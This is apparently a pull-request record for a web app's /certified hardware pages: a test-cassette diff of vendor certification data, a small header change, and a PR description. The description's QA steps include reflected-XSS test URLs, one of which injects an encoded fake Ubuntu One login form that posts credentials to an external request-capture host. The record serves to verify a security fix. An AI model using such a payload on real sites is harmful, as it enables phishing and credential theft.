+        0, "make": "ADLink Technology, Inc.", "resource_uri": "/api/v1/certifiedmakes/ADLink%20Technology,%20Inc./",
+        "servers": 0, "smart_core": 5, "soc": 0, "total": 5}, {"desktops": 0, "laptops":
+        0, "make": "Cavium, Inc.", "resource_uri": "/api/v1/certifiedmakes/Cavium,%20Inc./",
+        "servers": 3, "smart_core": 0, "soc": 2, "total": 5}, {"desktops": 0, "laptops":
+        0, "make": "DFI", "resource_uri": "/api/v1/certifiedmakes/DFI/", "servers":
+        0, "smart_core": 4, "soc": 0, "total": 4}, {"desktops": 0, "laptops": 0, "make":
+        "OnLogic", "resource_uri": "/api/v1/certifiedmakes/OnLogic/", "servers": 0,
+        "smart_core": 4, "soc": 0, "total": 4}, {"desktops": 0, "laptops": 0, "make":
+        "Rigado", "resource_uri": "/api/v1/certifiedmakes/Rigado/", "servers": 0,
+        "smart_core": 4, "soc": 0, "total": 4}, {"desktops": 0, "laptops": 0, "make":
+        "Eurotech", "resource_uri": "/api/v1/certifiedmakes/Eurotech/", "servers":
+        0, "smart_core": 3, "soc": 0, "total": 3}, {"desktops": 0, "laptops": 0, "make":
+        "Honeywell, Inc.", "resource_uri": "/api/v1/certifiedmakes/Honeywell,%20Inc./",
+        "servers": 0, "smart_core": 3, "soc": 0, "total": 3}, {"desktops": 0, "laptops":
+        0, "make": "Fujitsu", "resource_uri": "/api/v1/certifiedmakes/Fujitsu/", "servers":
+        3, "smart_core": 0, "soc": 0, "total": 3}, {"desktops": 0, "laptops": 0, "make":
+        "Mellanox Technologies", "resource_uri": "/api/v1/certifiedmakes/Mellanox%20Technologies/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 3}, {"desktops": 0, "laptops":
+        0, "make": "Penguin Computing", "resource_uri": "/api/v1/certifiedmakes/Penguin%20Computing/",
+        "servers": 2, "smart_core": 0, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
+        0, "make": "ASRock Industrial", "resource_uri": "/api/v1/certifiedmakes/ASRock%20Industrial/",
+        "servers": 0, "smart_core": 2, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
+        0, "make": "Wiwynn", "resource_uri": "/api/v1/certifiedmakes/Wiwynn/", "servers":
+        2, "smart_core": 0, "soc": 0, "total": 2}, {"desktops": 0, "laptops": 0, "make":
+        "Ampere Computing, LLC", "resource_uri": "/api/v1/certifiedmakes/Ampere%20Computing,%20LLC/",
+        "servers": 0, "smart_core": 0, "soc": 2, "total": 2}, {"desktops": 1, "laptops":
+        0, "make": "Dell Computer Corporation", "resource_uri": "/api/v1/certifiedmakes/Dell%20Computer%20Corporation/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
+        0, "make": "GIGA-BYTE TECHNOLOGY CO., LTD.", "resource_uri": "/api/v1/certifiedmakes/GIGA-BYTE%20TECHNOLOGY%20CO.,%20LTD./",
+        "servers": 1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "FETCi", "resource_uri": "/api/v1/certifiedmakes/FETCi/", "servers":
+        1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make":
+        "Tyrone Systems", "resource_uri": "/api/v1/certifiedmakes/Tyrone%20Systems/",
+        "servers": 1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "Avnet IoT Gateway", "resource_uri": "/api/v1/certifiedmakes/Avnet%20IoT%20Gateway/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 1, "laptops":
+        0, "make": "IEI", "resource_uri": "/api/v1/certifiedmakes/IEI/", "servers":
+        0, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make":
+        "ZTE", "resource_uri": "/api/v1/certifiedmakes/ZTE/", "servers": 1, "smart_core":
+        0, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make": "Axiomtek",
+        "resource_uri": "/api/v1/certifiedmakes/Axiomtek/", "servers": 0, "smart_core":
+        1, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make": "Open Compute
+        Project", "resource_uri": "/api/v1/certifiedmakes/Open%20Compute%20Project/",
+        "servers": 1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "InoNet Computer GmbH", "resource_uri": "/api/v1/certifiedmakes/InoNet%20Computer%20GmbH/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "Element Biosciences", "resource_uri": "/api/v1/certifiedmakes/Element%20Biosciences/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "Asus", "resource_uri": "/api/v1/certifiedmakes/Asus/", "servers":
+        0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make":
+        "Interactive Strength Inc", "resource_uri": "/api/v1/certifiedmakes/Interactive%20Strength%20Inc/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}]}'
+    headers:
+      Cache-Control:
+      - no-cache
+      Connection:
+      - keep-alive
+      Content-Length:
+      - '9068'
+      Content-Type:
+      - application/json
+      Date:
+      - Fri, 15 Dec 2023 09:10:31 GMT
+      Strict-Transport-Security:
+      - max-age=15724800; includeSubDomains
+      Vary:
+      - Accept, Cookie
+      X-QueryInspect-Duplicate-SQL-Queries:
+      - '0'
+      X-QueryInspect-Num-SQL-Queries:
+      - '2'
+      X-QueryInspect-Total-Request-Time:
+      - 148 ms
+      X-QueryInspect-Total-SQL-Time:
+      - 113 ms
     status:
       code: 200
       message: OK

--- a/webapp/handlers.py
+++ b/webapp/handlers.py
@@ -47,6 +47,10 @@ def init_handlers(app, sentry):
         if flask.request.path.startswith(disable_cache_on):
             response.cache_control.no_store = True
 
+        # Prevent XSS
+        if flask.request.path.startswith("/certified"):
+            response.headers["X-Frame-Options"] = "DENY"
+
         return response
 
     # Error pages


### PR DESCRIPTION
## Done

- Parse query params for /certified
- Clean up code
- Fix filters not reloading on category pages when first hitting the page (changes in .js file)


## QA

- Check https://ubuntu-com-13405.demos.haus/certified/laptops?q=&category=Laptop&release=Core+22%22%3E%3Ciframe+onload%3Dalert%28%27REDACTED%27%29%3E&release=Core+20&release=Core+18&release=Core+22 this shouldn't open the alert window
- Do the same for [this one](https://ubuntu.com/certified/laptops?q=&category=Laptop&release=Core+22%22%3E%3Ciframe%20onload=%22javascript:document.body.innerHTML%20=%20atob(%27PGRpdiBjbGFzcz0icC1tb2RhbCIgaWQ9Im1vZGFsIj4gPHNlY3Rpb24gY2xhc3M9InAtbW9kYWxfX2RpYWxvZyIgcm9sZT0iZGlhbG9nIiBhcmlhLW1vZGFsPSJ0cnVlIiBhcmlhLWxhYmVsbGVkYnk9Im1vZGFsLXRpdGxlIiBhcmlhLWRlc2NyaWJlZGJ5PSJtb2RhbC1kZXNjcmlwdGlvbiI%2BIDxoZWFkZXIgY2xhc3M9InAtbW9kYWxfX2hlYWRlciI%2BIDxoMiBjbGFzcz0icC1tb2RhbF9fdGl0bGUiIGlkPSJtb2RhbC10aXRsZSI%2BTG9naW48L2gyPiA8L2hlYWRlcj4gPHAgaWQ9Im1vZGFsLWRlc2NyaXB0aW9uIj5QbGVhc2UgZW50ZXIgeW91IFVidW50dSBPbmUgY3JlZGVudGlhbHMgdG8gY29udGludWU8L3A%2BIDxkaXYgY2xhc3M9InAtaGVhZGluZy1pY29uLS1zbWFsbCI%2BIDxmb3JtIGFjdGlvbj0iaHR0cHM6Ly9lbm82bWJuZzRxeGRuLngucGlwZWRyZWFtLm5ldCI%2BIDxpbnB1dCB0eXBlPSJlbWFpbCIgaWQ9ImVtYWlsIiBuYW1lPSJlbWFpbCIgcGxhY2Vob2xkZXI9IllvdXIgZW1haWwiIGF1dG9jb21wbGV0ZT0iZW1haWwiPiA8bGFiZWwgZm9yPSJleGFtcGxlSW5wdXRQYXNzd29yZDEiPlBhc3N3b3JkPC9sYWJlbD4gPGlucHV0IHR5cGU9InBhc3N3b3JkIiBpZD0icGFzcyIgbmFtZT0icGFzcyIgcGxhY2Vob2xkZXI9IllvdXIgcGFzc3dvcmQiIGF1dG9jb21wbGV0ZT0iY3VycmVudC1wYXNzd29yZCI%2BIDxidXR0b24gdHlwZT0ic3VibWl0IiBuYW1lPSJzdWJtaXQiPkxvZ2luPC9idXR0b24%2BIDwvZm9ybT4gPC9kaXY%2BIDwvc2VjdGlvbj48L2Rpdj4%3D%27)%22%3E%3C/iframe%3E&release=Core+20&release=Core+18&release=Core+22)
- Check current filters work as usual. e.g.:
  - Go to  /certified?q=xps click on "desktop" filter and select vendor and release, then check that redirects to /desktop page with respective params, and checkboxes checked.
 

## Issue / Card

Fixes https://warthogs.atlassian.net/browse/WD-7941
